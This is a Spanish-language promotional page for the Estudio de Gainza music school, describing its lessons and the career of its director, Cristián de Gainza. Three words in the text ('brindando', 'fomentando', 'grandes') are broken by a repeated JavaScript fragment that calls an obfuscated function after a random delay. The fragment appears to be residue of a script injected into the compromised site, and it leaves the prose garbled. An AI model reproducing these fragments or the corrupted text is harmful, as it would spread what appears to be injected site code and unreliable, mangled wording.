Loading...
Formación 2018-11-12T16:22:12+00:00

Clases Individuales de instrumento, canto y tecnología musical para principiantes y profesionales.

Clases para todas las edades y niveles:
• Piano • Guitarra • Bajo • Canto
• Preparación de ingresos al UNA, UCA, Conservatorios, etc.
• Tecnología musical: home studio, software de producción, VST, etc.

Estudio de Gainza

Googleá “Método Gainza” y conocé más sobre un nombre que es sinónimo de pedagogía musical moderna en todo el mundo.
Somos expertos en motivación y llevamos décadas dedicados a enseñar música.

Nuestro método abreva en lo mejor de las vertientes clásica y popular, brindandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando una formación integral. Buscamos la excelencia artística, fomentandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando la creatividad, con un especial cuidado por los procesos individuales.

>Ver más sobre Estudio de Gainza

Cristián de Gainza

Ing. Cristián de Gainza
Socio-Director de Ideo Music y de Estudio de Gainza

Formado en el seno de las nuevas corrientes de pedagogía musical, enseña desde hace décadas a niños, adolescentes, jóvenes y adultos.

Estudió piano desde muy pequeño con su madre, Violeta de Gainza, con Esther Schneider, y continuó estudios de piano, jazz y armonía con Jorge Navarro, Santiago Giacobbe, Claudio Gabis y Alberto Quercia Lagos, entre otros.

Cursó además estudios universitarios y se recibió de Ingeniero en la Universidad de Buenos Aires a los 23 años.

A lo largo de su vida ha enseñado piano a cientos de alumnos de todas las edades y niveles, con especialidad en la iniciación.

Como Director de Pedagogías Musicales Abiertas, fue responsable de la introducción y la difusión en Sudamérica de algunas de las más grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes personalidades de la música y la pedagogía musical mundial. Orientándose a la formación y actualización de músicos y docentes de música, Pedagogías Musicales Abiertas ha editado libros y videos, y organizado talleres intensivos, clases magistrales, conferencias, mesas redondas y conciertos en la Argentina y países limítrofes.

En forma paralela a su trabajo pedagógico, ha sido productor de artistas como Luis Pescetti, Fito Paez, Miguel Ángel Estrella, la Camerata Bariloche, Marta Minujín y Edgardo Giménez, y ha producido eventos en el Teatro Colón, el Luna Park, el Teatro San Martín, el Museo Nacional de Bellas Artes, el Teatro El Círculo de Rosario y algunos de los principales teatros de Córdoba, Mendoza, Tucumán, Mar del Plata, Bahía Blanca y La Plata.